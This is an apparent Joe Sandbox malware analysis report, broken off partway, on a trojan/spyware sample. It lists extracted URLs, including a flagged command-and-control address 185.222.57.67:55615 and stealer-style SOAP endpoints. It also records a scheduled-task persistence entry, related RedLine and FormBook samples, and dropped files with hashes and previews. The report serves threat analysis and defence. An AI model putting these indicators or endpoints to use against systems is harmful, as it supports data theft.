https://api.ip.sb/geoip	PO.exe, 0000000F.00000002.2265027022.0000000003110000.00000004.00000800.00020000.00000000.sdmp, QntRsaVyLKlY.exe, 00000016.00000002.2352220376.0000000003040000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/soap/envelope/	QntRsaVyLKlY.exe, 00000016.00000002.2352220376.0000000003040000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	tmp1165.tmp.22.dr, tmp4DCC.tmp.15.dr, tmpDB20.tmp.22.dr, tmp1176.tmp.22.dr, tmp1196.tmp.22.dr, tmp852B.tmp.15.dr, tmp15B0.tmp.15.dr, tmp4DAC.tmp.15.dr, tmpDACF.tmp.22.dr, tmp11A6.tmp.22.dr, tmp853B.tmp.15.dr, tmp475E.tmp.22.dr, tmp1145.tmp.22.dr, tmpA44D.tmp.15.dr, tmp4D7B.tmp.15.dr, tmpDAEF.tmp.22.dr, tmp4D8B.tmp.15.dr, tmpDB00.tmp.22.dr, tmpBC0D.tmp.15.dr, tmp855C.tmp.15.dr, tmp15A0.tmp.15.dr	false	Avira URL Cloud: safe	unknown
http://tempuri.org/	QntRsaVyLKlY.exe, 00000016.00000002.2352220376.0000000003082000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Endpoint/CheckConnect	PO.exe, 0000000F.00000002.2265027022.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, QntRsaVyLKlY.exe, 00000016.00000002.2352220376.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	tmp1165.tmp.22.dr, tmp4DCC.tmp.15.dr, tmpDB20.tmp.22.dr, tmp1176.tmp.22.dr, tmp1196.tmp.22.dr, tmp852B.tmp.15.dr, tmp15B0.tmp.15.dr, tmp4DAC.tmp.15.dr, tmpDACF.tmp.22.dr, tmp11A6.tmp.22.dr, tmp853B.tmp.15.dr, tmp475E.tmp.22.dr, tmp1145.tmp.22.dr, tmpA44D.tmp.15.dr, tmp4D7B.tmp.15.dr, tmpDAEF.tmp.22.dr, tmp4D8B.tmp.15.dr, tmpDB00.tmp.22.dr, tmpBC0D.tmp.15.dr, tmp855C.tmp.15.dr, tmp15A0.tmp.15.dr	false	URL Reputation: safe	unknown
https://www.ecosia.org/newtab/	tmp1165.tmp.22.dr, tmp4DCC.tmp.15.dr, tmpDB20.tmp.22.dr, tmp1176.tmp.22.dr, tmp1196.tmp.22.dr, tmp852B.tmp.15.dr, tmp15B0.tmp.15.dr, tmp4DAC.tmp.15.dr, tmpDACF.tmp.22.dr, tmp11A6.tmp.22.dr, tmp853B.tmp.15.dr, tmp475E.tmp.22.dr, tmp1145.tmp.22.dr, tmpA44D.tmp.15.dr, tmp4D7B.tmp.15.dr, tmpDAEF.tmp.22.dr, tmp4D8B.tmp.15.dr, tmpDB00.tmp.22.dr, tmpBC0D.tmp.15.dr, tmp855C.tmp.15.dr, tmp15A0.tmp.15.dr	false	URL Reputation: safe	unknown
http://tempuri.org/Endpoint/VerifyUpdateResponse	PO.exe, 0000000F.00000002.2265027022.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, QntRsaVyLKlY.exe, 00000016.00000002.2352220376.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.chiark.greenend.org.uk/~sgtatham/putty/0	PO.exe	false	URL Reputation: safe	unknown
http://tempuri.org/Endpoint/SetEnviron	PO.exe, 0000000F.00000002.2265027022.0000000003347000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://tempuri.org/Endpoint/SetEnvironment	QntRsaVyLKlY.exe, 00000016.00000002.2352220376.0000000003082000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://tempuri.org/Endpoint/SetEnvironmentResponse	PO.exe, 0000000F.00000002.2265027022.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, QntRsaVyLKlY.exe, 00000016.00000002.2352220376.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://185.222.57.67:55615	PO.exe, 0000000F.00000002.2265027022.0000000003138000.00000004.00000800.00020000.00000000.sdmp, PO.exe, 0000000F.00000002.2265027022.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, QntRsaVyLKlY.exe, 00000016.00000002.2352220376.000000000323E000.00000004.00000800.00020000.00000000.sdmp, QntRsaVyLKlY.exe, 00000016.00000002.2352220376.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp, QntRsaVyLKlY.exe, 00000016.00000002.2352220376.0000000003082000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://tempuri.org/Endpoint/GetUpdates	QntRsaVyLKlY.exe, 00000016.00000002.2352220376.000000000323E000.00000004.00000800.00020000.00000000.sdmp, QntRsaVyLKlY.exe, 00000016.00000002.2352220376.000000000306A000.00000004.00000800.00020000.00000000.sdmp, QntRsaVyLKlY.exe, 00000016.00000002.2352220376.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp, QntRsaVyLKlY.exe, 00000016.00000002.2352220376.0000000003040000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ac.ecosia.org/autocomplete?q=	tmp1165.tmp.22.dr, tmp4DCC.tmp.15.dr, tmpDB20.tmp.22.dr, tmp1176.tmp.22.dr, tmp1196.tmp.22.dr, tmp852B.tmp.15.dr, tmp15B0.tmp.15.dr, tmp4DAC.tmp.15.dr, tmpDACF.tmp.22.dr, tmp11A6.tmp.22.dr, tmp853B.tmp.15.dr, tmp475E.tmp.22.dr, tmp1145.tmp.22.dr, tmpA44D.tmp.15.dr, tmp4D7B.tmp.15.dr, tmpDAEF.tmp.22.dr, tmp4D8B.tmp.15.dr, tmpDB00.tmp.22.dr, tmpBC0D.tmp.15.dr, tmp855C.tmp.15.dr, tmp15A0.tmp.15.dr	false	URL Reputation: safe	unknown
https://api.ipify.orgcookies//settinString.Removeg	PO.exe, PO.exe, 0000000F.00000002.2262603009.0000000000402000.00000040.00000400.00020000.00000000.sdmp, QntRsaVyLKlY.exe, 00000011.00000002.2241712167.0000000003A26000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing	PO.exe, 0000000F.00000002.2265027022.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, QntRsaVyLKlY.exe, 00000016.00000002.2352220376.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://185.222.57.67:55615t-eq	QntRsaVyLKlY.exe, 00000016.00000002.2352220376.000000000323E000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://tempuri.org/Endpoint/GetUpdatesResponse	PO.exe, 0000000F.00000002.2265027022.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, QntRsaVyLKlY.exe, 00000016.00000002.2352220376.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	tmp1165.tmp.22.dr, tmp4DCC.tmp.15.dr, tmpDB20.tmp.22.dr, tmp1176.tmp.22.dr, tmp1196.tmp.22.dr, tmp852B.tmp.15.dr, tmp15B0.tmp.15.dr, tmp4DAC.tmp.15.dr, tmpDACF.tmp.22.dr, tmp11A6.tmp.22.dr, tmp853B.tmp.15.dr, tmp475E.tmp.22.dr, tmp1145.tmp.22.dr, tmpA44D.tmp.15.dr, tmp4D7B.tmp.15.dr, tmpDAEF.tmp.22.dr, tmp4D8B.tmp.15.dr, tmpDB00.tmp.22.dr, tmpBC0D.tmp.15.dr, tmp855C.tmp.15.dr, tmp15A0.tmp.15.dr	false	URL Reputation: safe	unknown
http://185.222.57.67:5	PO.exe, 0000000F.00000002.2265027022.0000000003347000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://tempuri.org/Endpoint/EnvironmentSettingsResponse	PO.exe, 0000000F.00000002.2265027022.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, QntRsaVyLKlY.exe, 00000016.00000002.2352220376.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://tempuri.org/Endpoint/VerifyUpdate	PO.exe, 0000000F.00000002.2265027022.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, QntRsaVyLKlY.exe, 00000016.00000002.2352220376.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://tempuri.org/0	PO.exe, 0000000F.00000002.2265027022.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, QntRsaVyLKlY.exe, 00000016.00000002.2352220376.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	PO.exe, 00000007.00000002.2154355610.00000000030A1000.00000004.00000800.00020000.00000000.sdmp, PO.exe, 0000000F.00000002.2265027022.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, QntRsaVyLKlY.exe, 00000011.00000002.2239923951.0000000002A0D000.00000004.00000800.00020000.00000000.sdmp, QntRsaVyLKlY.exe, 00000016.00000002.2352220376.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	tmp1165.tmp.22.dr, tmp4DCC.tmp.15.dr, tmpDB20.tmp.22.dr, tmp1176.tmp.22.dr, tmp1196.tmp.22.dr, tmp852B.tmp.15.dr, tmp15B0.tmp.15.dr, tmp4DAC.tmp.15.dr, tmpDACF.tmp.22.dr, tmp11A6.tmp.22.dr, tmp853B.tmp.15.dr, tmp475E.tmp.22.dr, tmp1145.tmp.22.dr, tmpA44D.tmp.15.dr, tmp4D7B.tmp.15.dr, tmpDAEF.tmp.22.dr, tmp4D8B.tmp.15.dr, tmpDB00.tmp.22.dr, tmpBC0D.tmp.15.dr, tmp855C.tmp.15.dr, tmp15A0.tmp.15.dr	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/soap/actor/next	PO.exe, 0000000F.00000002.2265027022.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, QntRsaVyLKlY.exe, 00000016.00000002.2352220376.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
185.222.57.67	unknown	Netherlands		51447	ROOTLAYERNETNL	true

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1474391
Start date and time:	2024-07-16 19:56:05 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 28s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	25
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	owKQ0b029a.exe renamed because original name is a hash value
Original Sample Name:	5404B47556A2E1E9EB2F5DA481002616.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@25/102@1/1
EGA Information:	Successful, ratio: 80%
HCA Information:	Successful, ratio: 99% Number of executed functions: 337 Number of non-executed functions: 77
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, RuntimeBroker.exe, WMIADAP.exe, Microsoft.Photos.exe, SIHClient.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 104.26.12.31, 104.26.13.31, 172.67.75.172
Excluded domains from analysis (whitelisted): api.ip.sb.cdn.cloudflare.net, fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target QntRsaVyLKlY.exe, PID 6976 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: owKQ0b029a.exe

Simulations

Behavior and APIs

Time	Type	Description
13:56:58	API Interceptor	36x Sleep call for process: PO.exe modified
13:57:05	API Interceptor	31x Sleep call for process: powershell.exe modified
13:57:08	API Interceptor	40x Sleep call for process: QntRsaVyLKlY.exe modified
13:57:08	API Interceptor	1x Sleep call for process: owKQ0b029a.exe modified
19:57:07	Task Scheduler	Run new task: QntRsaVyLKlY path: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe

Joe Sandbox View / Context

IPs

⊘No context

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ROOTLAYERNETNL	8LcFUXH9xN.exe	Get hash	malicious	RedLine	Browse	185.222.57.74
	0h6tTGKedZ.exe	Get hash	malicious	RedLine	Browse	185.222.57.153
	SecuriteInfo.com.Exploit.CVE-2017-11882.123.8256.26893.rtf	Get hash	malicious	FormBook	Browse	45.137.22.78
	PO2767.xls	Get hash	malicious	FormBook	Browse	45.137.22.78
	SecuriteInfo.com.Exploit.CVE-2017-11882.123.30710.1319.rtf	Get hash	malicious	Unknown	Browse	45.137.22.78
	offertfrfrgan.xls	Get hash	malicious	Unknown	Browse	45.137.22.78
	p8Uz7qV7t1.exe	Get hash	malicious	RedLine	Browse	45.137.22.78
	opJ1SbGhmm.exe	Get hash	malicious	RedLine	Browse	45.137.22.124
	5QHy8tjDuO.exe	Get hash	malicious	RedLine	Browse	45.137.22.171
	3.bat.exe	Get hash	malicious	GuLoader	Browse	45.137.22.69

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\PO.exe.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	1968
Entropy (8bit):	5.345338934370444
Encrypted:	false
SSDEEP:	48:MxHKlYHKh3ouHgJHreylEHMHKo/tHo6hAHKzeRHKx1qHxvj:iqlYqh3ou0aymsqwtI6eqzqqxwRb
MD5:	A6AE821E85EB04F10E67C9D65E129C47
SHA1:	8B3295F40A2F7DCA294DE5502CFE6A751239DB2C
SHA-256:	BD5DE47C737626F6A162CDFE9476DE310476B56FAF917092DF2D9CD4059A6A41
SHA-512:	22E2404E8D989DC1F58B209B48A2BD0AFFA0E19B09100C3FD8417A8A23EBA109A36AF7031CAE33F8FF5BD798F01F81ACA129D90801B34A9607C2D62A63C643DD
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"WindowsBase, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\WindowsBase\4d760e3e4675c4a4c66b64205fb0d001\WindowsBase.ni.dll",0..3,"PresentationCore, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\PresentationCore\17470ef0c7a174f38bdcadacc3e310ad\PresentationCore.ni.dll",0..3,"PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\Presentatio5ae0f00f#\

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\QntRsaVyLKlY.exe.log

Download File

Process:	C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	1968
Entropy (8bit):	5.345338934370444
Encrypted:	false
SSDEEP:	48:MxHKlYHKh3ouHgJHreylEHMHKo/tHo6hAHKzeRHKx1qHxvj:iqlYqh3ou0aymsqwtI6eqzqqxwRb
MD5:	A6AE821E85EB04F10E67C9D65E129C47
SHA1:	8B3295F40A2F7DCA294DE5502CFE6A751239DB2C
SHA-256:	BD5DE47C737626F6A162CDFE9476DE310476B56FAF917092DF2D9CD4059A6A41
SHA-512:	22E2404E8D989DC1F58B209B48A2BD0AFFA0E19B09100C3FD8417A8A23EBA109A36AF7031CAE33F8FF5BD798F01F81ACA129D90801B34A9607C2D62A63C643DD
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"WindowsBase, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\WindowsBase\4d760e3e4675c4a4c66b64205fb0d001\WindowsBase.ni.dll",0..3,"PresentationCore, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\PresentationCore\17470ef0c7a174f38bdcadacc3e310ad\PresentationCore.ni.dll",0..3,"PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\Presentatio5ae0f00f#\

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	modified
Size (bytes):	2232
Entropy (8bit):	5.380805901110357
Encrypted:	false
SSDEEP:	48:lylWSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMuge//Z8vUyus:lGLHyIFKL3IZ2KRH9Ouggs
MD5:	B171BCCDDA0A76C24B6654C5D4CF3B80
SHA1:	E1012D8FA07FC3BF4E00342EB9E94A5C83C8B8BD
SHA-256:	C9854D03D91051DA649CC5880DE7848FEF51ACE5B4B5E399272A851AB1A317B2
SHA-512:	F40CC9DDE5DCB432D2D0F4C1B641624F5B90EABC185BFA8558891F3977F38B63C6E226AB140B18DF8A70BB86F8B15878DE5B60CB35F31CA241F1755687A19E24
Malicious:	false
Preview:	@...e.................................^..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..\|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...\|...........System.ConfigurationH................WY..2.M.&..g(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe

Download File

Process:	C:\Users\user\Desktop\owKQ0b029a.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	550920
Entropy (8bit):	7.891666015031055
Encrypted:	false
SSDEEP:	12288:13QfYVK+orvWdcjjs0OzZgN3RV7ib0KnggidUzxF7+wdIbH2TdTkR:81+PejtrN3G0UdiSzxgw+bSM
MD5:	8A9837F38BD2C2ADDA21106E3B75FFA8
SHA1:	D03BC9129AEB9AF731AFD9FD676487592C48FC5B
SHA-256:	FDB3927EBECB2D7611D047BE77C913E6848D24D87EC24D84D76E851839D2FADB
SHA-512:	AC938FFF9572A37A2FB801999FE7A2EE9DC72CE0FB4A4878AA2EF2676E76477AAEB9F6A248B92682425F3DFC911835B757C688FF8DEB5A48AA92CFDBB03161CD
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 83%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....2.f..............0..............1... ...@....@.. ....................................@.................................P1..O....@...............2...6...`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`.......0..............@..B.................1......H........z...f..........h....O..........................................b.(.....(.....s!...}.....J..{....o....(....J..{....o....(....J..{....o....(....J..{....o....(....J..{....o....(....J..{....o....(....J..{....o....(....J..{....o....(....J..{....o....(....J..{....o....(....J..{....o....(....F.{....r...po....F.{....r...po....F.{....r!..po....F.{....r3..po......{....o ....{.....{....o....o......{.....o....&.{.....{....o....o....*.0...........o.............o

C:\Users\user\AppData\Local\Temp\RarSFX0\PO.jpg

Download File

Process:	C:\Users\user\Desktop\owKQ0b029a.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, progressive, precision 8, 390x552, components 3
Category:	dropped
Size (bytes):	49161
Entropy (8bit):	7.9640442162988965
Encrypted:	false
SSDEEP:	768:LWTHytOtCeYfsfd8HAeA5Sz8Q3X1taN5adCKWEnMAyk8n/syo:qTj7Yfsfd8Ha5Sz/nHaN5adrlYsf
MD5:	E83CCB51EE74EFD2A221BE293D23C69A
SHA1:	4365CA564F7CDD7337CF0F83AC5FD64317FB4C32
SHA-256:	DA931852A19A707D01C3EDF138622B8601056C42525F8AC40CB48AF43A7410CC
SHA-512:	0252E629FBDAFDB66FF63EF76D18F25D1CA46AC3EFF019F012361DB45EBD34D1A7A9AD35F7A2FC5830676C771997633F3ABF1DC3224BD8F6BD55456B0A554A46
Malicious:	false
Preview:	......JFIF.....`.`.....C....................................................................C.......................................................................(...."................................................................................`...4....0CI.#..!..i..`..!..i..`..!..i..`..!..i..`..!..i..`....f.....8q.+..k...8..............\4..V^..._....o.....S..6......C?......../.;..G.~...J}fw..o.).B..S~..l..o...?\|.]...'/...@...7...+.........>..}#..7.......n....+4_.......c].;....J%Ye}....c.3...-..O..[y.!../@......f.....0....#p....\|u.2.Yc[.%v.[.?..P.=K..D.,z.zN.......(...._Qv..i.........7...+..l.doY.z.E...%7..._.6..sU.;k-.:K.H.i.Y.........B...Q...IZ..SR..R........U..0y.&l^.}...X.3Q.s3..#=.....].6&...Z6..i...e"K..&C...<...>....?..........-%...\;p.....7_..............:r..B.8....p...4...[.eN..e.P...+.^......bB..Y...>?l.wIlr.KG.L..`.....$z..FTu....`....u.{.@.......4.iK.OQ.......R-.(.g?%...................>;F......L+d.......m.S.+`...h3.v#.a.P.......

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_00aynja5.503.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3csrkitz.ihe.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dcolt1o2.ard.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fq4lmlew.o0v.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jchskypr.4ni.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_m1ylo0cs.lsn.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_oszw2gdd.upt.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
